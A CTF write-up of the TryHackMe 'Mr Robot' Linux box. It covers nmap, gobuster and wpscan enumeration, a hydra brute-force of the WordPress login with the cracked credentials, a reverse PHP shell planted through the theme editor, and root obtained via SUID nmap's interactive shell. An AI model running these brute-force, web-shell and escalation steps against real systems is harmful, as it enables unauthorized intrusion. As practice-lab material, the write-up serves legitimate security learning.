A medium Linux box from TryHackMe, use abuse wordpress admin for initial access, then an SUID binary for root.


Regular nmap scan

sudo nmap -sC -sV -oA nmap/mrrobot
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache
443/tcp open   ssl/http Apache httpd
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after:  2025-09-13T10:45:03
|_http-server-header: Apache

Do a quick gobuster for directories and files on the webserver, and see that there is a robots.txt file - a lil’ on the nose

Check the robots.txt file, and it has two endpoints, one being the first flag, the other a dictionary of strings


Sorting the dictionary with

cat fsocity.dic | cut -d ' ' -f 7 > tt.txt

Will probably be useful in the future for brute forcing something

Continue scanning with wp-scan for users

wpscan -eu --url --wp-content-dir 

And find two users

[i] User(s) Identified:

[+] mich05654
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[+] elliot
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)


Using the dictionary file downloaded from the site, as well as the passwords, run hydra to crack the login

hydra -L users.txt -P ./t2.txt -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -t 64
[80][http-post-form] host:   login: mich05654   password: Dylan_2791
[80][http-post-form] host:   login: elliot   password: ER28-0652

elliot:ER28-0652 mich05654:Dylan_2791

End up with both logins, lets try elliots first because he probably is the admin of the Mr Robot box

Elliot is indeed the admin, so upload a reverse php shell using the wordpress editor, changing the 404.php page and saving the changes

Navigating to to get a 404 page, and catch the reverse shell

On the box, navigate to the home directory, and see a robot user, with two files in the home directory

key-2-of-3.txt  password.raw-md5

The flag isn’t viewable as the server user, but the password is

cat password.raw-md5


Using a rainbow table, the password is abcdefghijklmnopqrstuvwxyz


Switch users, and get the second flag

Now looking to escalate to root, search for SUID enabled binaries

find / -perm -u=s -type f 2>/dev/null

And see nmap on the list


Which means can spawn nmap interactively

nmap --interactive

Then inside the prompt, run !sh to get a root shell

nmap> !sh

# whoami